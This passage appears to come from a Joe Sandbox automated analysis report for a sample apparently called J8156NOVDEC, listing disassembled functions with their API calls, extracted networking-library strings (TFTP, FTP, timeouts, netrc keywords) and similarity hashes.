    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006786A2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--$c
    • API String ID: 885266447-2082138188
    • Opcode ID: 5f57c6a91b7083e0c2feb8e29cea50f68c3a64540e095daf9306c33f57b8cde2
    • Instruction ID: c9bea1799973bde1300ecff77c881a5f8c2dd742adf8e2b9c88db63aae0b674d
    • Opcode Fuzzy Hash: 5f57c6a91b7083e0c2feb8e29cea50f68c3a64540e095daf9306c33f57b8cde2
    • Instruction Fuzzy Hash: BE5111B5E40209FFDB54DFACCC45FEE77BAAB88700F108519F618AB291D6749A408B94
    APIs
    • _free.LIBCMT ref: 006D8C5F
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006D8C6B
    • _free.LIBCMT ref: 006D8C76
    • _free.LIBCMT ref: 006D8C81
    • _free.LIBCMT ref: 006D8C8C
    • _free.LIBCMT ref: 006D8C97
    • _free.LIBCMT ref: 006D8CA2
    • _free.LIBCMT ref: 006D8CAD
    • _free.LIBCMT ref: 006D8CB8
    • _free.LIBCMT ref: 006D8CC6
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 725d41d0647ac7419f5c189804b3d244c413b98505ff83601b06b71954daf3e2
    • Instruction ID: e42b08bb33b5af5a9a5e0c66b936f1f7f7eadc575c9ab2c1133c694617ada113
    • Opcode Fuzzy Hash: 725d41d0647ac7419f5c189804b3d244c413b98505ff83601b06b71954daf3e2
    • Instruction Fuzzy Hash: 72219676D44108AFCB41EFA4C985DDEBBBABF08780B0041AAF5159B221DB71EA44CFC4
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066B06B
    Strings
    • select/poll returned error, xrefs: 0066ABFD
    • transfer closed with %I64d bytes remaining to read, xrefs: 0066AFB4
    • Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received, xrefs: 0066AEBD
    • Done waiting for 100-continue, xrefs: 0066AD9A
    • transfer closed with outstanding read data remaining, xrefs: 0066AFF4
    • *, xrefs: 0066ADBB
    • Operation timed out after %I64d milliseconds with %I64d bytes received, xrefs: 0066AF2A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$Done waiting for 100-continue$Operation timed out after %I64d milliseconds with %I64d bytes received$Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received$select/poll returned error$transfer closed with %I64d bytes remaining to read$transfer closed with outstanding read data remaining
    • API String ID: 930174750-1497102274
    • Opcode ID: 6c28047f403184082d0b5d14bca5163aa57863df97f1352fd447c872b322009a
    • Instruction ID: 8d740f4a1767caafeff7c16cb68996183c0004f4098219e7a728d5f1ece7303a
    • Opcode Fuzzy Hash: 6c28047f403184082d0b5d14bca5163aa57863df97f1352fd447c872b322009a
    • Instruction Fuzzy Hash: 5C12FF75A00208DFDB04DF98C595AAAB7B2FF88314F24C199E8199B356D731ED82CF91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A472E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $ $default$login$machine$machine$password
    • API String ID: 930174750-1990327166
    • Opcode ID: 113d9a784e48c2f08acf5ea7fb14aad15223fe1320f165e8d4809dc39f54a0c4
    • Instruction ID: d3d0b6deede4288c470d353a79ef2165f1c6f790afbc9ea4e97c46d91e727720
    • Opcode Fuzzy Hash: 113d9a784e48c2f08acf5ea7fb14aad15223fe1320f165e8d4809dc39f54a0c4
    • Instruction Fuzzy Hash: CBE18FB0D04259CBDF10EFA8DC457EEBBB2AF86305F044059E81567281DBB59E84CFA2
    APIs
    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 0068BB91
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068BBB5
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
      • Part of subcall function 006A5920: _strncpy.LIBCMT ref: 006A598E
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A06
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A2E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
      • Part of subcall function 006A5920: SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 0068BD69
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068BD8D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068BF97
    Strings
    • 7, xrefs: 0068BBDD
    • tftp_tx: giving up waiting for block %d ack, xrefs: 0068BB3E
    • Received ACK for block %d, expecting %d, xrefs: 0068BB08
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$CheckStackVars@8_strrchrsendto$Failure_strlen_strncpy
    • String ID: 7$Received ACK for block %d, expecting %d$tftp_tx: giving up waiting for block %d ack
    • API String ID: 1536197400-4006335497
    • Opcode ID: 04bbeb81e773fbf80996638651df9c9f747a3bbbe194b0e09619e682cccd8844
    • Instruction ID: 3d9abaaf994e5c0265a32093e266b5a598e9de99d362c63642e81a9fb9b3a309
    • Opcode Fuzzy Hash: 04bbeb81e773fbf80996638651df9c9f747a3bbbe194b0e09619e682cccd8844
    • Instruction Fuzzy Hash: AEB12BB5A00204EFCB48DF44C895EEA77B6BF88354F1482A8F9495F352D735EA81CB94
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 099e153fec326c1038b840983a1706d7c806df3ec282136028de23fefa57fe32
    • Instruction ID: 14824d5b4e5b948c1dfa17c4178bd0e3690a68caff03755130626afb92f18338
    • Opcode Fuzzy Hash: 099e153fec326c1038b840983a1706d7c806df3ec282136028de23fefa57fe32
    • Instruction Fuzzy Hash: E3C1D270E082499FDB15DF98DC81BADBBB2BF49300F04425EF514AB392D7349A45CB66
    APIs
    • _strstr.LIBCMT ref: 006A26F0
    • ___from_strstr_to_strchr.LIBCMT ref: 006A2737
    • _strrchr.LIBCMT ref: 006A2768
    • ___from_strstr_to_strchr.LIBCMT ref: 006A2785
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$Failure_strrchr_strstr
    • String ID:
    • API String ID: 1856706798-0
    • Opcode ID: 17553af1c06be76d89ca076c802fbea12f822e7c69dc0274fd1538508dedcfa2
    • Instruction ID: b9b2d6acd0fb36edcf6a23dc2e7d32492d819a5c6e6ee03f01ddddb10808c5e8
    • Opcode Fuzzy Hash: 17553af1c06be76d89ca076c802fbea12f822e7c69dc0274fd1538508dedcfa2
    • Instruction Fuzzy Hash: DFC192B0D0011ADBDB14EFA8D8A5BFEBBB2AF46304F148069E5116B341D6399E85CF90
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 855f75a9283e3fecd5322c24c7af7d578e9503724f65318a845de7e334858817
    • Instruction ID: 95a1c38d2452ccafb77cb3fc35ee3ee991b1329c4f424ff465a7e11ecd40b547
    • Opcode Fuzzy Hash: 855f75a9283e3fecd5322c24c7af7d578e9503724f65318a845de7e334858817
    • Instruction Fuzzy Hash: 2F610072900341DFDB20DF65C881BAAB7EAAF45710F20416EE955EF382EB70AD419B60
    APIs
      • Part of subcall function 00664570: @_RTC_CheckStackVars@8.LIBCMT ref: 0066473D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00665087
    Strings
    • Trying %s:%ld..., xrefs: 00664CBC
    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00664C80
    • Immediate connect fail for %s: %s, xrefs: 0066501D
    • 4', xrefs: 00664FE0
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Trying %s:%ld...$4'$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
    • API String ID: 930174750-4073160896
    • Opcode ID: 935d6cbae05d7d2bcdd1c8bb332485679cf0f736df5e79313d811e57b800f16e
    • Instruction ID: 64d9d50881f5190b271f3a5931e39ea362641bb69c4d3f1e38662f1f725737b7
    • Opcode Fuzzy Hash: 935d6cbae05d7d2bcdd1c8bb332485679cf0f736df5e79313d811e57b800f16e
    • Instruction Fuzzy Hash: 52E17E75A00228DFDB64DF14DC45BEAB7B6AF46304F0481D8E54D9B242DB319E85CF92
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %c%c%c%c$%c%c%c=$%c%c==$Hhg
    • API String ID: 1951014933-557099382
    • Opcode ID: 4d6826f78a77ac1103817559cfd1f7b1f44b4e45015ad8efb5a917d9ceae92f1
    • Instruction ID: 78dad61f675349eb05d2aec93dbd09742dcddc3f69df71cc79f62f6e5712f142
    • Opcode Fuzzy Hash: 4d6826f78a77ac1103817559cfd1f7b1f44b4e45015ad8efb5a917d9ceae92f1
    • Instruction Fuzzy Hash: 3AB107B0E042598BEB04DF68D8517FE7BB2EF45300F148279E851AB381D679DA81CBA1
    APIs
      • Part of subcall function 0069B180: @_RTC_CheckStackVars@8.LIBCMT ref: 0069B2A5
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069B4A0
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • Ctrl conn has data while waiting for data conn, xrefs: 0069B451
    • There is negative response in cache while serv connect, xrefs: 0069B3B2
    • Accept timeout occurred while waiting server connect, xrefs: 0069B370
    • Checking for server connect, xrefs: 0069B351
    • Error while waiting for server connect, xrefs: 0069B40E
    • Ready to accept data connection from server, xrefs: 0069B430
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Accept timeout occurred while waiting server connect$Checking for server connect$Ctrl conn has data while waiting for data conn$Error while waiting for server connect$Ready to accept data connection from server$There is negative response in cache while serv connect
    • API String ID: 572576967-3883132819
    • Opcode ID: 35169ea4e852a893846698f1c9e4fc58ed7bfcfde6d26633462b8d46f654c601
    • Instruction ID: b42843ff054326275dd8237c96e5ef6b1caa14da757fe7feca9ef9decc0f12d6
    • Opcode Fuzzy Hash: 35169ea4e852a893846698f1c9e4fc58ed7bfcfde6d26633462b8d46f654c601
    • Instruction Fuzzy Hash: CE51E5B5E00208EBCF04DF98EA81BEE77BBEB44700F108129F405AB796D7759A41DB91
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636740
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636762
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636782
    • __Getctype.LIBCPMT ref: 0063681B
    • std::_Facet_Register.LIBCPMT ref: 0063683A
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636852
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
    • String ID: ?qo
    • API String ID: 1102183713-996102081
    • Opcode ID: ba05b99e1a8650d7f48ae03ce2a671339943dcc9fe7d08dad00ee8bdec4a1bcd
    • Instruction ID: bb6b011e718eb06f3cf5578b794dc9b81be63486ed3ddc20019c018fb7f38066
    • Opcode Fuzzy Hash: ba05b99e1a8650d7f48ae03ce2a671339943dcc9fe7d08dad00ee8bdec4a1bcd
    • Instruction Fuzzy Hash: 8C41C071A00205EFCB11DF58C841AAABBB6EB14714F14C26DE8459B392EB31BD41CBD5
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckCleanupStackStartupVars@8
    • String ID: if_nametoindex$iphlpapi.dll
    • API String ID: 1294282189-3097795196
    • Opcode ID: 0c65912690e693e67dc5a1196f514da2d8dfe25e2a4605f7ba448f1c20598551
    • Instruction ID: d2f69a8978285c72a8e290a19c56f263746234dc68d2f30b86cbab187c9a5417
    • Opcode Fuzzy Hash: 0c65912690e693e67dc5a1196f514da2d8dfe25e2a4605f7ba448f1c20598551
    • Instruction Fuzzy Hash: 5E411B71A00234DFE760AB18FC467F976B7DB41700F008169F449AB291DB794EC0CB92
    APIs
    • #79.WLDAP32(00000000), ref: 0068E6DD
    • #200.WLDAP32(00000000), ref: 0068E701
    • #301.WLDAP32(00000000,00000000), ref: 0068E71F
    • #79.WLDAP32(00000000), ref: 0068E762
    • #200.WLDAP32(00000000), ref: 0068E786
    • #301.WLDAP32(00000000,00000000), ref: 0068E7A4
    • #79.WLDAP32(00000000), ref: 0068EB22
    • #200.WLDAP32(00000000), ref: 0068EB46
    • #41.WLDAP32(00000000), ref: 0068EBD0
    • #46.WLDAP32(00000000), ref: 0068EC1D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068EC69
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: #200$#301$CheckStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 864918980-741417676
    • Opcode ID: 0f93cc2fb08e34c87ec355eab725b376fa43bb3e52fa754c5d655a036f42ead2
    • Instruction ID: 3b6e766062415734981c0557529e0c5551c0a63df95224ad164c785b3a138ced
    • Opcode Fuzzy Hash: 0f93cc2fb08e34c87ec355eab725b376fa43bb3e52fa754c5d655a036f42ead2
    • Instruction Fuzzy Hash: 3741D2B1D00214ABDF24FBA8EC46BDD7376AB05314F144328F919372D2DA366E80CB96
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: #200$CheckFailureStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 3109384284-741417676
    • Opcode ID: 82679db345273812d268d9b12af24b22004be2ba80314913ab99939d5a7dfcf4
    • Instruction ID: b2ae5615ec3bf869adb392b776b95456cfe4d91daa9982d6bdc9084aacd6d7c3
    • Opcode Fuzzy Hash: 82679db345273812d268d9b12af24b22004be2ba80314913ab99939d5a7dfcf4
    • Instruction Fuzzy Hash: F231D1B1D00214DFCF20EBA8EC46BDDB376AF49314F148369E91977291DA355E80CBA6
    APIs
    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
    • __allrem.LIBCMT ref: 0066D454
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
    • GetTickCount.KERNEL32 ref: 0066D483
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CheckCountCounterPerformanceQueryStackTickVars@8__allrem
    • String ID: "g
    • API String ID: 1302298639-3212855092
    • Opcode ID: d43d44c790a13397a8be361f60fa82790224645e069651809ed0c7714819551a
    • Instruction ID: 19e3f04b1ba0e4832e1074a091d03e9ce7a189c1f86bff6b0b7b1c4c590d00a0
    • Opcode Fuzzy Hash: d43d44c790a13397a8be361f60fa82790224645e069651809ed0c7714819551a
    • Instruction Fuzzy Hash: 1331D2B1E001159FD744DB99DC51EEEB7FAEB8C300F14822DF509A7361DB74A9408BA4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$___from_strstr_to_strchr
    • String ID:
    • API String ID: 3409252457-0
    • Opcode ID: d438cc183548ee31baf4017d9e7f05fe7e570b923855dcc76c2d864cea3cc776
    • Instruction ID: da5e71ada7d0a73a4f7612a91fe4d8d9c6e12c1a48e11244c884b38342dd1d4e
    • Opcode Fuzzy Hash: d438cc183548ee31baf4017d9e7f05fe7e570b923855dcc76c2d864cea3cc776
    • Instruction Fuzzy Hash: A7510A71D05389AFFB10AFBA9851ABE77A6EF01310F10416EE51097383DBB58981CB95
    APIs
      • Part of subcall function 0067D6D0: getaddrinfo.WS2_32(?,?,?,?), ref: 0067D720
      • Part of subcall function 0067D6D0: @_RTC_CheckStackVars@8.LIBCMT ref: 0067D977
    • WSAGetLastError.WS2_32 ref: 00652816
    • WSAGetLastError.WS2_32 ref: 00652829
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • EnterCriticalSection.KERNEL32(?), ref: 00652865
    • LeaveCriticalSection.KERNEL32 ref: 00652883
    • send.WS2_32(000000FF,00000001,00000001,00000000), ref: 006528ED
    • WSAGetLastError.WS2_32 ref: 00652900
    • LeaveCriticalSection.KERNEL32(?), ref: 00652925
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065293E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
